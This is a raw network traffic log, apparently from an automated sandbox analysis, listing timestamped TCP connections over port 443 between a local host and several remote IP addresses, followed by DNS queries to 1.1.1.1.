                                                            Feb 1, 2024 21:38:48.632047892 CET49779443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.632064104 CET44349779104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.632108927 CET49779443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.632114887 CET44349779104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.632178068 CET44349779104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.632215977 CET49779443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.632592916 CET49779443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.632603884 CET44349779104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.645165920 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.667135000 CET44349784104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.667176008 CET44349784104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.667224884 CET49784443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.667256117 CET44349784104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.667280912 CET44349784104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.667331934 CET49784443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.669030905 CET49784443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.669045925 CET44349784104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.695133924 CET44349783104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.695183992 CET44349783104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.695234060 CET49783443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.695250034 CET44349783104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.695281982 CET44349783104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.695516109 CET49783443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.702977896 CET49783443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.702997923 CET44349783104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.706971884 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.707072973 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.707164049 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.707194090 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.710761070 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.710787058 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.711766005 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.711772919 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.711832047 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.718430042 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.727258921 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.727317095 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.727324009 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.727334023 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.727514982 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.735836029 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.740175962 CET44349786104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.743913889 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.743968964 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.744034052 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.744045019 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.744117975 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.748682976 CET49786443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.748716116 CET44349786104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.749411106 CET44349786104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.749990940 CET49786443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.750085115 CET44349786104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.750355959 CET49786443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.751199961 CET49788443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.751247883 CET44349788104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.751313925 CET49788443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.751985073 CET49788443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.751996040 CET44349788104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.757030010 CET49789443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.757059097 CET44349789104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.757132053 CET49789443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.757705927 CET49789443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.757718086 CET44349789104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.763879061 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.764061928 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.764086962 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.764126062 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.764137030 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.764271975 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.764708042 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.772324085 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.772355080 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.772398949 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.772408009 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.772618055 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.793905973 CET44349786104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.822794914 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.825634003 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.825687885 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.825696945 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.825717926 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.825782061 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.825789928 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.837049007 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.837095976 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.837110996 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.844466925 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.844535112 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.844542980 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.848073006 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.848123074 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.848130941 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.852843046 CET44349787104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.853337049 CET49787443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.853354931 CET44349787104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.853358030 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.853406906 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.853421926 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.853704929 CET44349787104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.854919910 CET49787443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.854988098 CET44349787104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.855516911 CET49787443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.860459089 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.860521078 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.860532999 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.867418051 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.867502928 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.867521048 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.874425888 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.874494076 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.874506950 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.888062000 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.888128042 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.888147116 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.888351917 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.888360977 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.897938013 CET44349787104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.910216093 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.910269976 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.910295963 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.910340071 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.910435915 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.910442114 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.910476923 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.910943031 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.911014080 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.921185970 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.921262980 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.921448946 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.921530008 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.927710056 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.927761078 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.931102991 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.931145906 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.935183048 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.935223103 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.943612099 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.943660021 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.944044113 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.944092989 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.955465078 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.955527067 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.955599070 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.955647945 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.958240032 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.959235907 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.959315062 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.959330082 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.959476948 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.959496021 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.959531069 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.959695101 CET49781443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:48.959708929 CET44349781104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:48.996489048 CET44349788104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.004669905 CET44349789104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.041364908 CET49788443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:49.055254936 CET49789443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:49.056865931 CET49788443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:49.056876898 CET44349788104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.057169914 CET49789443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:49.057183981 CET44349789104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.057357073 CET44349788104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.058573008 CET44349789104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.058636904 CET49789443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:49.062406063 CET49788443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:49.062501907 CET44349788104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.062906027 CET49789443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:49.063044071 CET44349789104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.063167095 CET49788443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:49.063206911 CET49789443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:49.063216925 CET44349789104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.105915070 CET44349788104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.117412090 CET49789443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:49.144496918 CET44349786104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.144566059 CET44349786104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.144587040 CET44349786104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.144625902 CET49786443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:49.144659996 CET44349786104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.144702911 CET49786443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:49.144711971 CET44349786104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.144746065 CET44349786104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.144834042 CET49786443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:49.159907103 CET49786443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:49.159930944 CET44349786104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.369565010 CET44349787104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.369607925 CET44349787104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.369633913 CET44349787104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.369663000 CET49787443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:49.369693995 CET44349787104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.369765997 CET44349787104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.369779110 CET49787443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:49.369807959 CET49787443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:49.501950979 CET49787443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:49.501977921 CET44349787104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.511354923 CET44349788104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.511399031 CET44349788104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.511493921 CET44349788104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.511543036 CET49788443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:49.516676903 CET49788443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:49.516695023 CET44349788104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.543193102 CET44349789104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.543245077 CET44349789104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.543334007 CET44349789104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:49.543381929 CET49789443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:49.547857046 CET49789443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:49.547869921 CET44349789104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:39:09.938863039 CET49792443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:09.938896894 CET4434979235.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:09.938961029 CET49792443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:09.939965010 CET49792443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:09.939975977 CET4434979235.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.056358099 CET49793443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.056384087 CET4434979335.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.056509018 CET49793443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.057746887 CET49793443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.057759047 CET4434979335.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.150603056 CET4434979235.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.151297092 CET49792443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.151318073 CET4434979235.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.151680946 CET4434979235.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.152436972 CET49792443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.152493000 CET4434979235.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.152767897 CET49792443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.193902969 CET4434979235.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.268404961 CET4434979335.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.271717072 CET49793443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.271742105 CET4434979335.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.272849083 CET4434979335.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.272921085 CET49793443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.273761988 CET49793443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.273819923 CET4434979335.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.274238110 CET49793443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.274244070 CET4434979335.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.321527958 CET49793443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.382956982 CET4434979235.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.383030891 CET4434979235.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.383085966 CET49792443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.383294106 CET49792443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.383312941 CET4434979235.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.383919954 CET49794443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.383964062 CET4434979435.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.384059906 CET49794443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.384471893 CET49794443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.384484053 CET4434979435.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.386821985 CET49795443192.168.2.4108.177.122.106
                                                            Feb 1, 2024 21:39:10.386850119 CET44349795108.177.122.106192.168.2.4
                                                            Feb 1, 2024 21:39:10.387048960 CET49795443192.168.2.4108.177.122.106
                                                            Feb 1, 2024 21:39:10.387465954 CET49795443192.168.2.4108.177.122.106
                                                            Feb 1, 2024 21:39:10.387481928 CET44349795108.177.122.106192.168.2.4
                                                            Feb 1, 2024 21:39:10.499562979 CET4434979335.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.499747992 CET4434979335.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.499804974 CET49793443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.500210047 CET49793443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.500224113 CET4434979335.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.501394033 CET49796443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.501435995 CET4434979635.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.501487970 CET49796443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.502048016 CET49796443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.502064943 CET4434979635.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.595686913 CET4434979435.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.596036911 CET49794443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.596098900 CET4434979435.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.596472979 CET4434979435.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.597474098 CET49794443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.597556114 CET4434979435.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.598012924 CET49794443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.598109961 CET49794443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.598157883 CET4434979435.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.600812912 CET44349795108.177.122.106192.168.2.4
                                                            Feb 1, 2024 21:39:10.601164103 CET49795443192.168.2.4108.177.122.106
                                                            Feb 1, 2024 21:39:10.601187944 CET44349795108.177.122.106192.168.2.4
                                                            Feb 1, 2024 21:39:10.601530075 CET44349795108.177.122.106192.168.2.4
                                                            Feb 1, 2024 21:39:10.602093935 CET49795443192.168.2.4108.177.122.106
                                                            Feb 1, 2024 21:39:10.602160931 CET44349795108.177.122.106192.168.2.4
                                                            Feb 1, 2024 21:39:10.651738882 CET49795443192.168.2.4108.177.122.106
                                                            Feb 1, 2024 21:39:10.721394062 CET4434979635.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.722111940 CET49796443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.722131968 CET4434979635.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.722532988 CET4434979635.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.724164963 CET49796443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.724241018 CET4434979635.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.724406004 CET49796443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.724406004 CET49796443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.724436998 CET4434979635.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.826208115 CET4434979435.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.826284885 CET4434979435.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.826499939 CET49794443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.827747107 CET49794443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.827790022 CET4434979435.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.953623056 CET4434979635.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.953702927 CET4434979635.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.954020023 CET49796443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.954047918 CET4434979635.190.80.1192.168.2.4
                                                            Feb 1, 2024 21:39:10.954072952 CET49796443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:10.954125881 CET49796443192.168.2.435.190.80.1
                                                            Feb 1, 2024 21:39:14.531301975 CET49797443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:39:14.531358004 CET44349797104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:39:14.531464100 CET49797443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:39:14.531945944 CET49797443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:39:14.531971931 CET44349797104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:39:14.777537107 CET44349797104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:39:14.777826071 CET49797443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:39:14.777869940 CET44349797104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:39:14.778275013 CET44349797104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:39:14.778600931 CET49797443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:39:14.778669119 CET44349797104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:39:14.832417011 CET49797443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:39:20.679964066 CET44349795108.177.122.106192.168.2.4
                                                            Feb 1, 2024 21:39:20.680031061 CET44349795108.177.122.106192.168.2.4
                                                            Feb 1, 2024 21:39:20.680160046 CET49795443192.168.2.4108.177.122.106
                                                            Feb 1, 2024 21:39:22.782809019 CET49795443192.168.2.4108.177.122.106
                                                            Feb 1, 2024 21:39:22.782879114 CET44349795108.177.122.106192.168.2.4
                                                            Feb 1, 2024 21:39:29.769742012 CET44349797104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:39:29.769819021 CET44349797104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:39:29.770009995 CET49797443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:39:30.631714106 CET49797443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:39:30.631752968 CET44349797104.21.73.88192.168.2.4
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Feb 1, 2024 21:38:06.262684107 CET53606931.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:38:06.295859098 CET5875353192.168.2.41.1.1.1
                                                            Feb 1, 2024 21:38:06.296331882 CET5800853192.168.2.41.1.1.1
                                                            Feb 1, 2024 21:38:06.296957970 CET5543053192.168.2.41.1.1.1
                                                            Feb 1, 2024 21:38:06.297266960 CET5905053192.168.2.41.1.1.1
                                                            Feb 1, 2024 21:38:06.413469076 CET53587531.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:38:06.413501024 CET53580081.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:38:06.414499998 CET53554301.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:38:06.414525986 CET53590501.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:38:07.016061068 CET53640521.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:38:08.354418039 CET6315653192.168.2.41.1.1.1
                                                            Feb 1, 2024 21:38:08.354654074 CET5630153192.168.2.41.1.1.1
                                                            Feb 1, 2024 21:38:08.473035097 CET53563011.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:38:08.486990929 CET53631561.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:38:09.079020977 CET5293153192.168.2.41.1.1.1
                                                            Feb 1, 2024 21:38:09.080130100 CET5497153192.168.2.41.1.1.1
                                                            Feb 1, 2024 21:38:09.373353958 CET53529311.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:38:09.375652075 CET53549711.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:38:10.083065987 CET5896453192.168.2.41.1.1.1
                                                            Feb 1, 2024 21:38:10.084863901 CET5219853192.168.2.41.1.1.1
                                                            Feb 1, 2024 21:38:10.200758934 CET53589641.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:38:10.202130079 CET53521981.1.1.1192.168.2.4
                                                            Feb 1, 2024 21:38:10.341320038 CET5335353192.168.2.41.1.1.1
                                                            Feb 1, 2024 21:38:10.342251062 CET5283853192.168.2.41.1.1.1
